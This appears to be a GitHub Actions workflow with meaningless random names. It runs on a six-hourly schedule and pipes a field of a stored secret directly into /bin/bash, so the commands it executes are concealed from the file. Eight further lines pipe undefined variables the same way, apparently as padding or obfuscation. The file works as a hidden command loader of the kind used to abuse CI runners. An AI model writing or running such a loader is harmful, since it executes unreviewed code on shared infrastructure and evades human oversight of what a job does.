name: songjunnu2109

on:
  workflow_dispatch:
  schedule:
    - cron: '22 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songjunnu2109
        env:
          srglw02: ${{ secrets.srglw02 }}
        run: |
          echo $srglw02 | jq -r .wzfaw111 | /bin/bash
          echo $qhbf24 | jq -r .yb32670 | /bin/bash
          echo $vhsuy6 | jq -r .azvr1 | /bin/bash
          echo $sbdgz452 | jq -r .ea1741 | /bin/bash
          echo $dczfm644 | jq -r .rfnbm4 | /bin/bash
          echo $m674 | jq -r .s64 | /bin/bash
          echo $wp84 | jq -r .curtg93577 | /bin/bash
          echo $g58939 | jq -r .ogdoe83652 | /bin/bash
          echo $m6 | jq -r .vnel20 | /bin/bash

